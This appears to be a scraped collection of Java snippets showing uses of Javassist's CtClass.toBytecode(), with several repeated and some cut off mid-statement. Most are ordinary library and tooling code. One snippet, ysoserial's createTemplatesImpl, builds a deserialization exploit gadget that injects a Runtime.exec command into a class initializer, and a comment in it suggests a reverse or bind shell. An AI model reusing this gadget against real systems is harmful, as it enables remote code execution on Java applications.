/** * Converts this class to a class file. * Once this method is called, further modifications are not * possible any more. * * @return the contents of the class file. */ public byte[] toBytecode() throws IOException, CannotCompileException { ByteArrayOutputStream barray = new ByteArrayOutputStream(); DataOutputStream out = new DataOutputStream(barray); try { toBytecode(out); } finally { out.close(); } return barray.toByteArray(); }
/** * Writes a class file represented by this <code>CtClass</code> * object on a local disk. * Once this method is called, further modifications are not * possible any more. * * @param directoryName it must end without a directory separator. * @see #debugWriteFile(String) */ public void writeFile(String directoryName) throws CannotCompileException, IOException { DataOutputStream out = makeFileOutput(directoryName); try { toBytecode(out); } finally { out.close(); } }
/** * Invokes the protected {@code defineClass()} in {@code ClassLoader}. * It converts the given {@link CtClass} object into a {@code java.lang.Class} object. */ public Class<?> invokeDefineClass(CtClass cc) throws IOException, CannotCompileException { byte[] code = cc.toBytecode(); return defineClass(cc.getName(), code, 0, code.length); } }
/** * Converts this class to a class file. * Once this method is called, further modifications are not * possible any more. * * @return the contents of the class file. */ public byte[] toBytecode() throws IOException, CannotCompileException { ByteArrayOutputStream barray = new ByteArrayOutputStream(); DataOutputStream out = new DataOutputStream(barray); try { toBytecode(out); } finally { out.close(); } return barray.toByteArray(); }
private byte[] getByteCode(CtClass managedCtClass) { ByteArrayOutputStream byteStream = new ByteArrayOutputStream(); DataOutputStream out = new DataOutputStream( byteStream ); try { managedCtClass.toBytecode( out ); return byteStream.toByteArray(); } catch (Exception e) { log.unableToTransformClass( e.getMessage() ); throw new HibernateException( "Unable to transform class: " + e.getMessage() , e ); } finally { try { out.close(); } catch (IOException ignored) { } } }
/** * Writes a class file represented by this <code>CtClass</code> * object on a local disk. * Once this method is called, further modifications are not * possible any more. * * @param directoryName it must end without a directory separator. * @see #debugWriteFile(String) */ public void writeFile(String directoryName) throws CannotCompileException, IOException { DataOutputStream out = makeFileOutput(directoryName); try { toBytecode(out); } finally { out.close(); } }
@Override protected void insertCode(List<CtClass> box, File jarFile) throws IOException, CannotCompileException { ZipOutputStream outStream = new JarOutputStream(new FileOutputStream(jarFile)); //get every class in the box ,ready to insert code for (CtClass ctClass : box) { //change modifier to public ,so all the class in the apk will be public ,you will be able to access it in the patch ctClass.setModifiers(AccessFlag.setPublic(ctClass.getModifiers())); if (isNeedInsertClass(ctClass.getName()) && !(ctClass.isInterface() || ctClass.getDeclaredMethods().length < 1)) { //only insert code into specific classes zipFile(transformCode(ctClass.toBytecode(), ctClass.getName().replaceAll("\\.", "/")), outStream, ctClass.getName().replaceAll("\\.", "/") + ".class"); } else { zipFile(ctClass.toBytecode(), outStream, ctClass.getName().replaceAll("\\.", "/") + ".class"); } } outStream.close(); }
private static File createJarFile(File jar) throws IOException, CannotCompileException, NotFoundException { Manifest manifest = new Manifest(); Attributes attrs = manifest.getMainAttributes(); attrs.put(Attributes.Name.MANIFEST_VERSION, "1.0"); attrs.put(new Attributes.Name("Premain-Class"), HotSwapAgent.class.getName()); attrs.put(new Attributes.Name("Agent-Class"), HotSwapAgent.class.getName()); attrs.put(new Attributes.Name("Can-Retransform-Classes"), "true"); attrs.put(new Attributes.Name("Can-Redefine-Classes"), "true"); JarOutputStream jos = null; try { jos = new JarOutputStream(new FileOutputStream(jar), manifest); String cname = HotSwapAgent.class.getName(); JarEntry e = new JarEntry(cname.replace('.', '/') + ".class"); jos.putNextEntry(e); ClassPool pool = ClassPool.getDefault(); CtClass clazz = pool.get(cname); jos.write(clazz.toBytecode()); jos.closeEntry(); } finally { if (jos != null) jos.close(); } return jar; } }
private boolean letUsersSendClassfile(OutputStream out, String filename, int length) throws IOException, BadHttpRequest { if (classPool == null) return false; byte[] classfile; String classname = filename.substring(0, length - 6).replace('/', '.'); try { if (translator != null) translator.onLoad(classPool, classname); CtClass c = classPool.get(classname); classfile = c.toBytecode(); if (debugDir != null) c.writeFile(debugDir); } catch (Exception e) { throw new BadHttpRequest(e); } sendHeader(out, classfile.length, typeClass); out.write(classfile); return true; }
byte[] b = ct.toBytecode(); java.lang.reflect.Method method; Object[] args;
private boolean letUsersSendClassfile(OutputStream out, String filename, int length) throws IOException, BadHttpRequest { if (classPool == null) return false; byte[] classfile; String classname = filename.substring(0, length - 6).replace('/', '.'); try { if (translator != null) translator.onLoad(classPool, classname); CtClass c = classPool.get(classname); classfile = c.toBytecode(); if (debugDir != null) c.writeFile(debugDir); } catch (Exception e) { throw new BadHttpRequest(e); } sendHeader(out, classfile.length, typeClass); out.write(classfile); return true; }
/** * Converts the class to a <code>java.lang.Class</code> object. * Once this method is called, further modifications are not allowed * any more. * * <p>This method is available in Java 9 or later. * It loads the class * by using the given {@code java.lang.invoke.MethodHandles.Lookup}. * </p> * * @param ct the class converted into {@code java.lang.Class}. * @since 3.24 */ public Class<?> toClass(CtClass ct, java.lang.invoke.MethodHandles.Lookup lookup) throws CannotCompileException { try { return javassist.util.proxy.DefineClassHelper.toClass(lookup, ct.toBytecode()); } catch (IOException e) { throw new CannotCompileException(e); } }
classfile = source.get(name).toBytecode();
/** * Converts the class to a <code>java.lang.Class</code> object. * Once this method is called, further modifications are not allowed * any more. * * <p>This method is available in Java 9 or later. * It loads the class * by using {@code java.lang.invoke.MethodHandles} with {@code neighbor}. * </p> * * @param ct the class converted into {@code java.lang.Class}. * @param neighbor a class belonging to the same package that * the converted class belongs to. * @since 3.24 */ public Class<?> toClass(CtClass ct, Class<?> neighbor) throws CannotCompileException { try { return javassist.util.proxy.DefineClassHelper.toClass(neighbor, ct.toBytecode()); } catch (IOException e) { throw new CannotCompileException(e); } }
neighbor, loader, domain, ct.toBytecode());
public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory ) throws Exception { final T templates = tplClass.newInstance(); // use template gadget class ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(StubTransletPayload.class)); pool.insertClassPath(new ClassClassPath(abstTranslet)); final CtClass clazz = pool.get(StubTransletPayload.class.getName()); // run command in static initializer // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "\");"; clazz.makeClassInitializer().insertAfter(cmd); // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) clazz.setName("ysoserial.Pwner" + System.nanoTime()); CtClass superC = pool.get(abstTranslet.getName()); clazz.setSuperclass(superC); final byte[] classBytes = clazz.toBytecode(); // inject class bytes into instance Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class) }); // required to make TemplatesImpl happy Reflections.setFieldValue(templates, "_name", "Pwnr"); Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance()); return templates; }
classfile = source.get(name).toBytecode();
/** * Redefines classes. */ public static void redefine(Class<?>[] oldClasses, CtClass[] newClasses) throws NotFoundException, IOException, CannotCompileException { startAgent(); ClassDefinition[] defs = new ClassDefinition[oldClasses.length]; for (int i = 0; i < oldClasses.length; i++) defs[i] = new ClassDefinition(oldClasses[i], newClasses[i].toBytecode()); try { instrumentation.redefineClasses(defs); } catch (ClassNotFoundException e) { throw new NotFoundException(e.getMessage(), e); } catch (UnmodifiableClassException e) { throw new CannotCompileException(e.getMessage(), e); } }
if (ctClass.isInterface() || ctClass.getDeclaredMethods().length < 1) { zipFile(ctClass.toBytecode(), outStream, ctClass.getName().replaceAll("\\.", "/") + ".class"); continue; zipFile(ctClass.toBytecode(), outStream, ctClass.getName().replaceAll("\\.", "/") + ".class");
byteCode = ctClass.toBytecode(); ctClass.detach();